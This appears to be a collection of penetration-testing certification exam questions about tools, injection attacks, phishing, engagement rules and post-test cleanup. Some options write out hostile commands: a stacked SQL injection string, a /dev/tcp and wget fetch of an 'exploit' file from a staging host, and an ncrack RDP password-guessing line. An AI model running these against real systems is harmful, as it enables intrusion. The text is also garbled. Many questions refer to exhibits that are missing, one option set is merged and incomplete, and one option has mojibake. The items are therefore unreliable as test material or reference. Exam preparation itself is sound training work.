A penetration tester has found indicators that a privileged user's password might be the same on 30 different Linux systems. Which of the following tools can help the tester identify the number of systems on which the password can be used?

A. Hydra

B. John the Ripper

C. Cain and Abel

D. Medusa

A penetration tester ran the following commands on a Windows server:
 
Which of the following should the tester do AFTER delivering the final report?

A. Delete the scheduled batch job.

B. Close the reverse shell connection.

C. Downgrade the svsaccount permissions.

D. Remove the tester-created credentials.

Which of the following is the BEST resource for obtaining payloads against specific network infrastructure products?

A. Exploit-DB

B. Metasploit

C. Shodan

D. Retina

Which of the following would assist a penetration tester the MOST when evaluating the susceptibility of top-level executives to social engineering attacks?

A. Scraping social media for personal details

B. Registering domain names that are similar to the target company’s

C. Identifying technical contacts at the company

D. Crawling the company’s website for company information

A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?

A. Maximizing the likelihood of finding vulnerabilities

B. Reprioritizing the goals/objectives

C. Eliminating the potential for false positives

D. Reducing the risk to the client environment

A penetration tester is looking for vulnerabilities within a company's web application that are in scope. The penetration tester discovers a login page and enters the following string in a field:
1;SELECT Username, Password FROM Users;
Which of the following injection attacks is the penetration tester using?

A. Blind SQL

B. Boolean SQL

C. Stacked queries

D. Error-based

When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:

A. security compliance regulations or laws may be violated.

B. testing can make detecting actual APT more challenging.

C. testing adds to the workload of defensive cyber- and threat-hunting teams.

D. business and network operations may be impacted.

A penetration tester captured the following traffic during a web-application test:
 
Which of the following methods should the tester use to visualize the authorization information being transmitted?

A. Decode the authorization header using UTF-8.

B. Decrypt the authorization header using bcrypt.

C. Decode the authorization header using Base64.

D. Decrypt the authorization header using AES.

During an assessment, a penetration tester Inspected a log and found a series of thousands of requests coming from a single IP address to the same URL. A few of the requests are listed below:
 
Which of the following vulnerabilities was the attacker trying to exploit?

A. Session hijacking

B. URL manipulation

C. SQL injection

D. Insecure direct object reference

A security analyst needs to perform an on-path attack on BLE smart devices. Which of the following tools would be BEST suited to accomplish this task?

A. Wireshark

B. Gattacker

C. tcpdump

D. Netcat

During an assessment, a penetration tester found a web component with no authentication requirements. The web component also allows file uploads and is hosted on one of the target public web servers. Which of the following actions should the penetration tester perform next?

A. Continue the assessment and mark the finding as critical.

B. Attempt to remediate the issue temporarily.

C. Notify the primary contact immediately.

D. Shut down the web server until the assessment is finished.

A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.
Which of the following tools or techniques would BEST support additional reconnaissance?

A. Wardriving

B. Shodan

C. Recon-ng

D. Aircrack-ng

A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago.
In which of the following places should the penetration tester look FIRST for the employees' numbers?

A. Web archive

B. GitHub

C. File metadata

D. Underground forums

Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?

A. To remove hash-cracking registry entries

B. To remove the tester-created Mimikatz account

C. To remove tools from the server

D. To remove a reverse shell from the system

A penetration tester issues the following command after obtaining a shell:
 
Which of the following describes this technique?

A. Establishing a backdoor

B. Privilege escalation

C. PowerShell remoting

D. Living-off-the-land

A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

A. nc 10.10.51.50 9891 & /dev/tcp/10.10.51.50/9891 0&1/exploit

D. wget 10.10.51.50:9891/exploit

A penetration tester uncovers access keys within an organization's source code management solution. Which of the following would BEST address the issue? (Choose two.)

A. Setting up a secret management solution for all items in the source code management system

B. Implementing role-based access control on the source code management system

C. Configuring multifactor authentication on the source code management system

D. Leveraging a solution to scan for other similar instances in the source code management system

E. Developing a secure software development life cycle process for committing code to the source code management system

F. Creating a trigger that will prevent developers from including passwords in the source code management system

HOTSPOT -
You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTION -
Giving the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:
 

A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?

A. Add a dependency checker into the tool chain.

B. Perform routine static and dynamic analysis of committed code.

C. Validate API security settings before deployment.

D. Perform fuzz testing of compiled binaries.

A penetration tester is conducting an authorized, physical penetration test to attempt to enter a client's building during non-business hours. Which of the following are MOST important for the penetration tester to have during the test? (Choose two.)

A. A handheld RF spectrum analyzer

B. A mask and personal protective equipment

C. Caution tape for marking off insecure areas

D. A dedicated point of contact at the client

E. The paperwork documenting the engagement

F. Knowledge of the building’s normal business hours

During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise. While reading the script, the penetration tester noticed the following lines of code:
 
Which of the following was the script author trying to do?

A. Spawn a local shell.

B. Disable NIC.

C. List processes.

D. Change the MAC address.

During an assessment, a penetration tester obtains a list of password digests using Responder. Which of the following tools would the penetration tester most likely use next?

A. Hashcat

B. Hydra

C. CeWL

D. Medusa

A penetration tester needs to perform a vulnerability scan against a web server. Which of the following tools is the tester MOST likely to choose?

A. Nmap

B. Nikto

C. Cain and Abel

D. Ethercap

During a client engagement, a penetration tester runs the following Nmap command and obtains the following output:
 
Which of the following should the penetration tester include in the report?

A. Old, insecure ciphers are in use.

B. The 3DES algorithm should be deprecated.

C. 2,048-bit symmetric keys are incompatible with MD5.

D. This server should be upgraded to TLS 1.2.

A penetration tester fuzzes an internal server looking for hidden services and applications and obtains the following output:
 
Which of the following is the MOST likely explanation for the output?

A. The tester is not using a valid SSL certificate.

B. The admin directory cannot be fuzzed because it is forbidden.

C. The admin, test, and db directories redirect to the log-in page.

D. The robots.txt file has six entries in it.

A penetration tester wants to test a list of common passwords against the SSH daemon on a network device. Which of the following tools would be BEST to use for this purpose?

A. Hashcat

B. Mimikatz

C. Patator

D. John the Ripper

A penetration tester needs to upload the results of a port scan to a centralized security tool. Which of the following commands would allow the tester to save the results in an interchangeable format?

A. nmap -iL results 192.168.0.10-100

B. nmap 192.168.0.10-100 -O > results

C. nmap -A 192.168.0.10-100 -oX results

D. nmap 192.168.0.10-100 | grep “results”

A penetration tester discovered that a client uses cloud mail as the company's email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page to remedy the issue. Which of the following BEST describes this attack?

A. Credential harvesting

B. Privilege escalation

C. Password spraying

D. Domain record abuse

During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT?

A. Badge cloning

B. Watering-hole attack

C. Impersonation

D. Spear phishing

Which of the following is the MOST secure method for sending the penetration test report to the client?

A. Host it on an online storage system.

B. Put it inside a password-protected ZIP file.

C. Transfer it via webmail using an HTTPS connection.

D. Use the client’s public key.

A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter, with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?

A. Data flooding

B. Session riding

C. Cybersquatting

D. Side channel

A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host.
Which of the following utilities would BEST support this objective?

A. Socat

B. tcpdump

C. Scapy

D. dig

A penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root CA into the trusted stone of the smartphone used for the tests, the application shows an error indicating a certificate mismatch and does not connect to the server. Which of the following is the
MOST likely reason for the error?

A. TCP port 443 is not open on the firewall

B. The API server is using SSL instead of TLS

C. The tester is using an outdated version of the application

D. The application has the API certificate pinned.

A penetration tester runs a scan against a server and obtains the following output:
 
Which of the following command sequences should the penetration tester try NEXT?

A. ftp 192.168.53.23

B. smbclient \WEB3IPC$ -I 192.168.53.23 -U guest

C. ncrack -u Administrator -P 15worst_passwords.txt -p rdp 192.168.53.23

D. curl -X TRACE https://192.168.53.23:8443/index.aspx

A penetration tester analyzed a web-application log file and discovered an input that was sent to the company's web application. The input contains a string that says "WAITFOR." Which of the following attacks is being attempted?

A. SQL injection

B. HTML injection

C. Remote command injection

D. DLL injection

A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

A. Nmap

B. tcpdump

C. Scapy

D. hping3

HOTSPOT
-
A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest.
INSTRUCTIONS
-
Select the tool the penetration tester should use for further investigation.
Select the two entries in the robots.txt file that the penetration tester should recommend for removal.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
 

A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP.
Which of the following steps should the tester take NEXT?

A. Send deauthentication frames to the stations.

B. Perform jamming on all 2.4GHz and 5GHz channels.

C. Set the malicious AP to broadcast within dynamic frequency selection channels.

D. Modify the malicious AP configuration to not use a preshared key.

Which of the following BEST describe the OWASP Top 10? (Choose two.)

A. The most critical risks of web applications

B. A list of all the risks of web applications

C. The risks defined in order of importance

D. A web-application security standard

E. A risk-governance and compliance framework

F. A checklist of Apache vulnerabilities

A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider's metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?

A. Cross-site request forgery

B. Server-side request forgery

C. Remote file inclusion

D. Local code inclusion

A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?

A. A signed statement of work

B. The correct user accounts and associated passwords

C. The expected time frame of the assessment

D. The proper emergency contacts for the client

A company recently moved its software development architecture from VMs to containers. The company has asked a penetration tester to determine if the new containers are configured correctly against a DDoS attack.
Which of the following should a tester perform FIRST?

A. Check the strength of the encryption settings.

B. Determine if security tokens are easily available.

C. Run a vulnerability check against the hypervisor.

D. Scan the containers for open ports.

An organization’s Chief Information Security Officer debates the validity of a critical finding from a penetration assessment that was completed six months ago. Which of the following post-report delivery activities would have most likely prevented this scenario?

A. Client acceptance

B. Data destruction process

C. Attestation of findings

D. Lessons learned

Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?

A. Acceptance by the client and sign-off on the final report

B. Scheduling of follow-up actions and retesting

C. Attestation of findings and delivery of the report

D. Review of the lessons during the engagement

A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers. Which of the following is MOST likely causing the TCP resets to occur during the assessment?

A. The web server is using a WAF.

B. The web server is behind a load balancer.

C. The web server is redirecting the requests.

D. The local antivirus on the web server Is rejecting the connection.

During an engagement, a penetration tester found the following list of strings inside a file:
 
Which of the following is the BEST technique to determine the known plaintext of the strings?

A. Dictionary attack

B. Rainbow table attack

C. Brute-force attack

D. Credential-stuffing attack

A penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts?

A. Tailgating

B. Dumpster diving

C. Shoulder surfing

D. Badge cloning

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.
Which of the following describes the scope of the assessment?

A. Partially known environment testing

B. Known environment testing

C. Unknown environment testing

D. Physical environment testing

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
 
Which of the following commands should the penetration tester run post-engagement?

A. grep -v apache ~/bash_history > ~/.bash_history

B. rm -rf /tmp/apache

C. chmod 600 /tmp/apache

D. taskkill /IM ג€apacheג€ /F

A penetration tester runs the unshadow command on a machine.
Which of the following tools will the tester most likely use NEXT?

A. John the Ripper

B. Hydra

C. Mimikatz

D. Cain and Abel